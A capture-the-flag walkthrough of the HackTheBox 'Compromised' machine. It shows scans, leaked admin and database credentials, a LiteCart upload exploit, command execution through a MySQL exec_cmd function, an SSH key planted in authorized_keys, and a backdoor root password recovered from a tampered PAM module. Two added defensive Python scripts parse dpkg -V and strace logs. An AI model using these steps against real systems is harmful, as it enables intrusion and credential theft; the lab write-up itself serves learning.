COMPROMISED HACKTHEBOX WRITEUP

NMAP SCANS

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-14 21:00 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:00
Completed NSE at 21:00, 0.00s elapsed
Initiating NSE at 21:00
Completed NSE at 21:00, 0.00s elapsed
Initiating NSE at 21:00
Completed NSE at 21:00, 0.00s elapsed
Initiating Ping Scan at 21:00
Scanning 10.10.10.207 [4 ports]
Completed Ping Scan at 21:00, 0.34s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 21:00
Scanning compromised.htb (10.10.10.207) [1000 ports]
Discovered open port 80/tcp on 10.10.10.207
Discovered open port 22/tcp on 10.10.10.207
Completed SYN Stealth Scan at 21:01, 15.68s elapsed (1000 total ports)
Initiating Service scan at 21:01
Scanning 2 services on compromised.htb (10.10.10.207)
Completed Service scan at 21:01, 6.57s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against compromised.htb (10.10.10.207)
Retrying OS detection (try #2) against compromised.htb (10.10.10.207)
Initiating Traceroute at 21:01
Completed Traceroute at 21:01, 0.29s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 21:01
Completed Parallel DNS resolution of 2 hosts. at 21:01, 0.16s elapsed
NSE: Script scanning 10.10.10.207.
Initiating NSE at 21:01
Completed NSE at 21:01, 8.43s elapsed
Initiating NSE at 21:01
Completed NSE at 21:01, 1.13s elapsed
Initiating NSE at 21:01
Completed NSE at 21:01, 0.00s elapsed
Nmap scan report for compromised.htb (10.10.10.207)
Host is up (0.28s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6e:da:5c:8e:8e:fb:8e:75:27:4a:b9:2a:59:cd:4b:cb (RSA)
|   256 d5:c5:b3:0d:c8:b6:69:e4:fb:13:a3:81:4a:15:16:d2 (ECDSA)
|_  256 35:6a:ee:af:dc:f8:5e:67:0d:bb:f3:ab:18:64:47:90 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: FD8AFB6FFE392F9ED98CC0B1B37B9A5D
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Legitimate Rubber Ducks | Online Store
|_Requested resource was http://compromised.htb/shop/en/
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.32 (91%), Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Adtran 424RG FTTH gateway (86%), Linux 2.6.32 - 3.1 (86%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 35.219 days (since Mon Aug 10 15:46:07 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   278.78 ms 10.10.14.1
2   278.87 ms compromised.htb (10.10.10.207)

NSE: Script Post-scanning.
Initiating NSE at 21:01
Completed NSE at 21:01, 0.00s elapsed
Initiating NSE at 21:01
Completed NSE at 21:01, 0.00s elapsed
Initiating NSE at 21:01
Completed NSE at 21:01, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.99 seconds
           Raw packets sent: 2088 (95.460KB) | Rcvd: 42 (2.536KB)

PORT 80

Let's use gobuster.

┌─[root@liquid]─[~]
└──╼ #gobuster dir -u http://10.10.10.207 -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.207
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/09/14 21:02:13 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/backup (Status: 301)
/index.php (Status: 302)
/server-status (Status: 403)
/shop (Status: 301)
===============================================================
2020/09/14 21:04:24 Finished
===============================================================

We got a directory named /backup.

So let's check that out!!!

It is a backup folder of the website,

where we could find data that could help with a foothold.

Here we have a file named /.log2301c9430d8593ae.txt

So let's open it.

User: admin Passwd: theNextGenSt0r3!~

Here we got creds.

Let's enumerate through more files.

Here we will see the salt hash in the includes directory and the admin creds which we already got.

Found here: the password salt hash and the database password.

Now that we have admin, we need an exploit for LiteCart.

https://www.exploit-db.com/exploits/45267

┌─[✗]─[root@liquid]─[~/Desktop/HTB/compromise]
└──╼ #python 45267.py -t http://10.10.10.207/shop/admin -u admin -p 'theNextGenSt0r3!~'

Here the exploit will run, but we could not get a shell.

So we will be using this, but since we cannot get a shell, let's just do it manually as described in the exploit.

Here we see that phpinfo works but commands do not, so we need another script for this to work. Also, we have to change the Content-Type from application/x-php to application/xml in Burp so that the file gets uploaded, as shown in the exploit we found on exploit-db; it can upload a shell but cannot run shell commands.

Let's figure this out: we have a script for this PHP exploit which could work.

https://github.com/Manangoel98/compromisemachine

Here we have exploit.php, which will work; you just need to change the value in pwn("id").

So just upload this the same way as we did for phpinfo, then navigate to the file and run it:

http://10.10.10.207/shop/vqmod/xml/exploit.php

Here you will see this.

Now we cannot get a shell as we don't have bash execution, so we need to get everything from here only.

As we can see in /etc/passwd, mysql has bash, and we also got creds for its database.

So for now we only have mysql creds to use; let's use that database and get more data.

Here I had to take help from my Discord friend.

https://mariadb.com/kb/en/mysqlfunc-table/

mysql -u root -pchangethis -e "SELECT * FROM mysql.func;"

So let's run some commands.

The main format for the mysql command part is that we can exec a command, as we know, so its format would be like this:

mysql -u root -pchangethis -e "SELECT trim(trailing char(0x00) from exec_cmd(\"id\"));"

You will see its output, as we can execute commands here.

So let's insert SSH keys in the mysql home directory and use them to get access as the mysql user.

GETTING USER ACCESS

Generate SSH keys

┌─[root@liquid]─[~/Desktop/HTB/compromise]
└──╼ #ssh-keygen -t ed25519
Generating public/private ed25519 key pair.
Enter file in which to save the key (/root/.ssh/id_ed25519): /root/Desktop/HTB/compromise/id_rsa
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/Desktop/HTB/compromise/id_rsa
Your public key has been saved in /root/Desktop/HTB/compromise/id_rsa.pub
The key fingerprint is:
SHA256:dhR8pLv+av+8874tQwjdyZNvjGGlFQuFrT/2Rv5v7g4 root@liquid
The key's randomart image is:
+--[ED25519 256]--+
|         .....+o.|
|          .o....+|
|          oo o.B |
|         .....X  |
|        S o. o.* |
|       . . .. o+=|
|          .  .E+o|
|         ..  .+.*|
|         .o+o.+#&|
+----[SHA256]-----+
┌─[root@liquid]─[~/Desktop/HTB/compromise]
└──╼ #chmod 600 id_rsa
┌─[root@liquid]─[~/Desktop/HTB/compromise]
└──╼ #

Copy the public key into the mysql home directory:

mysql -u root -pchangethis -e "SELECT trim(trailing char(0x00) from exec_cmd(\"mkdir -p ~/.ssh; echo ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKoXKoSkzttsg2CfmG7V51HozuTqgw3sO09YPWlTeuEU root@liquid > ~/.ssh/authorized_keys\"));"

Then trigger it through the exploit page.

Now just ssh into the machine.

┌─[✗]─[root@liquid]─[~/Desktop/HTB/compromise]
└──╼ #ssh -i id_rsa mysql@10.10.10.207
Last login: Mon Sep 14 16:58:01 2020 from 10.10.14.201
mysql@compromised:~$ id
uid=111(mysql) gid=113(mysql) groups=113(mysql)
mysql@compromised:~$ hostname
compromised
mysql@compromised:~$

Now we got mysql access but still cannot get the user file. Since the box is named Compromised, let's check which files were changed when this machine was compromised.

mysql@compromised:~$ dpkg -V 2>/dev/null
??5??????   /boot/System.map-4.15.0-99-generic
??5?????? c /etc/apache2/apache2.conf
??5?????? c /etc/apache2/sites-available/000-default.conf
??5??????   /boot/vmlinuz-4.15.0-101-generic
??5?????? c /etc/sudoers
??5?????? c /etc/sudoers.d/README
??5?????? c /etc/at.deny
??5?????? c /etc/iscsi/iscsid.conf
??5??????   /boot/vmlinuz-4.15.0-99-generic
??5??????   /bin/nc.openbsd
??5??????   /boot/System.map-4.15.0-101-generic
??5??????   /var/lib/polkit-1/localauthority/10-vendor.d/systemd-networkd.pkla
??5??????   /lib/x86_64-linux-gnu/security/pam_unix.so
??5?????? c /etc/apparmor.d/usr.sbin.mysqld
??5?????? c /etc/mysql/mysql.conf.d/mysqld.cnf
mysql@compromised:~$ 


Here we see that a number of files were changed, but the interesting one is

/lib/x86_64-linux-gnu/security/pam_unix.so
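As an added example (not part of the original writeup), here is a small parser for `dpkg -V` output that ranks the modified files by how suspicious they are. The sample input is constructed from the lines above, and the risk prefixes used for ranking are my own assumption.

```python
import re
from dataclasses import dataclass

# Constructed sample of `dpkg -V` output, modelled on the lines shown above.
SAMPLE_DPKG_V = """\
??5??????   /boot/System.map-4.15.0-99-generic
??5?????? c /etc/apache2/apache2.conf
??5?????? c /etc/sudoers
??5??????   /bin/nc.openbsd
??5??????   /lib/x86_64-linux-gnu/security/pam_unix.so
??5?????? c /etc/mysql/mysql.conf.d/mysqld.cnf
"""

# Assumed ranking: a changed package binary or library (not a conffile) is the
# strongest tamper signal; auth-related conffiles deserve a closer look.
HIGH_RISK_PREFIXES = ("/lib/", "/usr/lib/", "/bin/", "/usr/bin/", "/sbin/", "/usr/sbin/")
SENSITIVE_CONFFILES = ("/etc/sudoers", "/etc/pam.d/", "/etc/ssh/")

# dpkg -V line: 9 verification flags, a space, attribute ('c' = conffile), a space, path.
# Position 2 of the flags is '5' when the MD5 digest no longer matches the package.
LINE_RE = re.compile(r"^(?P<flags>[?.SM5DLUGT]{9}) (?P<attr>[c ]) (?P<path>/\S.*)$")

@dataclass
class Finding:
    path: str
    conffile: bool
    md5_mismatch: bool
    severity: str

def classify(path, conffile):
    if not conffile and path.startswith(HIGH_RISK_PREFIXES):
        return "high"    # modified binary/library: possible backdoor (e.g. a trojaned PAM module)
    if conffile and path.startswith(SENSITIVE_CONFFILES):
        return "medium"  # auth-relevant config edited; compare against the expected policy
    if conffile:
        return "low"     # conffiles routinely drift after legitimate admin changes
    return "medium"      # other package-owned files (kernels, data) changed

def parse_dpkg_verify(text):
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        flags, attr, path = m.group("flags", "attr", "path")
        findings.append(Finding(path, attr == "c", flags[2] == "5", classify(path, attr == "c")))
    return findings

def high_risk_paths(text):
    return [f.path for f in parse_dpkg_verify(text) if f.severity == "high"]
```

On a live host, pipe `dpkg -V 2>/dev/null` into `parse_dpkg_verify` and review the "high" entries first.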

So let's just check this binary right here using this command:

objdump -D /lib/x86_64-linux-gnu/security/pam_unix.so | less

You will see some hex digits.

Here, in the authentication function, we see these hex digits. Let's decode them and see what they actually are. This can be done in Ghidra as well.

If we use it as the password for root we get an authentication error, so just reverse it in Python, then try it again for root:

>>> "-2m28vnE3U~eklz"[::-1]
'zlke~U3Env82m2-'
>>> 

GOT ROOT ACCESS

root : zlke~U3Env82m2-

mysql@compromised:~$ su root
Password: 
root@compromised:/var/lib/mysql# cd
root@compromised:~# id
uid=0(root) gid=0(root) groups=0(root)
root@compromised:~# cat /root/root.txt
a33163ae366fab6d3ae951e41781c772
root@compromised:~# cat /home/sysadmin/user.txt 
94b44b229b50ea261ff73c225dcb6d59
root@compromised:~# 

Here we got root access. But there is still one more way here; I will be adding it ASAP!!

2nd Part: user sysadmin access

We have mysql access, and we can get the sysadmin password through a grep command just like this:

mysql@compromised:~$ grep -nlri sysadmin
strace-log.dat

Now we know the file which contains sysadmin in it; let's grep for password in this file.

mysql@compromised:~$ cat strace-log.dat | grep password
22102 03:11:06 write(2, "mysql -u root --password='3*NLJE"..., 39) = 39
22227 03:11:09 execve("/usr/bin/mysql", ["mysql", "-u", "root", "--password=3*NLJE32I$Fe"], 0x55bc62467900 /* 21 vars */) = 0
22227 03:11:09 write(2, "[Warning] Using a password on th"..., 73) = 73
22102 03:11:10 write(2, "mysql -u root --password='3*NLJE"..., 39) = 39
22228 03:11:15 execve("/usr/bin/mysql", ["mysql", "-u", "root", "--password=changeme"], 0x55bc62467900 /* 21 vars */) = 0
22228 03:11:15 write(2, "[Warning] Using a password on th"..., 73) = 73
22102 03:11:16 write(2, "mysql -u root --password='change"..., 35) = 35
22229 03:11:18 execve("/usr/bin/mysql", ["mysql", "-u", "root", "--password=changethis"], 0x55bc62467900 /* 21 vars */) = 0
22229 03:11:18 write(2, "[Warning] Using a password on th"..., 73) = 73
22232 03:11:52 openat(AT_FDCWD, "/etc/pam.d/common-password", O_RDONLY) = 5
22232 03:11:52 read(5, "#\n# /etc/pam.d/common-password -"..., 4096) = 1440
22232 03:11:52 write(4, "[sudo] password for sysadmin: ", 30) = 30
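As an added example (not from the original writeup), a scanner for strace logs like strace-log.dat that finds passwords passed on the command line and writes a redacted copy, which is how a defender would sweep archived traces for leaked secrets. The excerpt is constructed with placeholder secrets, and the option names it recognises are an assumption.

```python
import re

# Constructed strace excerpt modelled on the strace-log.dat lines above;
# the secrets are placeholders, not values from any real system.
SAMPLE_STRACE = """\
22227 03:11:09 execve("/usr/bin/mysql", ["mysql", "-u", "root", "--password=Pl4ceholder!"], 0x55bc62467900 /* 21 vars */) = 0
22227 03:11:09 write(2, "[Warning] Using a password on th"..., 73) = 73
22228 03:11:15 execve("/usr/bin/mysql", ["mysql", "-u", "root", "-pOtherPlaceholder"], 0x55bc62467900 /* 21 vars */) = 0
22230 03:11:20 execve("/usr/bin/ls", ["ls", "-la"], 0x55bc62467900 /* 21 vars */) = 0
"""

# strace's execve line: pid, timestamp, program, then a bracketed argv of quoted strings.
EXECVE_RE = re.compile(r'^(?P<pid>\d+) (?P<ts>\S+) execve\("(?P<prog>[^"]*)", \[(?P<argv>.*?)\]')
# One quoted argv element; strace escapes embedded quotes and non-printables with backslashes.
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
# Assumed set of arguments that embed a secret inline: --password=x and friends,
# or the glued MySQL form -px (case-sensitive so that -P, the port option, is ignored).
SECRET_ARG_RE = re.compile(
    r"^(?:(?P<long>--(?:password|passwd|token|secret))=|(?P<short>-p))(?P<secret>.+)$")

def split_argv(raw):
    return [m.group(1) for m in ARG_RE.finditer(raw)]

def find_leaks(text):
    """Return (pid, ts, prog, option) for every execve argv element that embeds a secret."""
    leaks = []
    for line in text.splitlines():
        m = EXECVE_RE.match(line)
        if not m:
            continue
        for arg in split_argv(m.group("argv")):
            s = SECRET_ARG_RE.match(arg)
            if s:
                leaks.append((m.group("pid"), m.group("ts"), m.group("prog"),
                              s.group("long") or s.group("short")))
    return leaks

def redact(text):
    """Rewrite the log with inline secrets masked so it can be archived or shared."""
    out = []
    for line in text.splitlines():
        m = EXECVE_RE.match(line)
        if m:
            for arg in split_argv(m.group("argv")):
                s = SECRET_ARG_RE.match(arg)
                if s:
                    masked = arg[: len(arg) - len(s.group("secret"))] + "<redacted>"
                    line = line.replace(f'"{arg}"', f'"{masked}"', 1)
        out.append(line)
    return "\n".join(out) + "\n"
```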

HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE
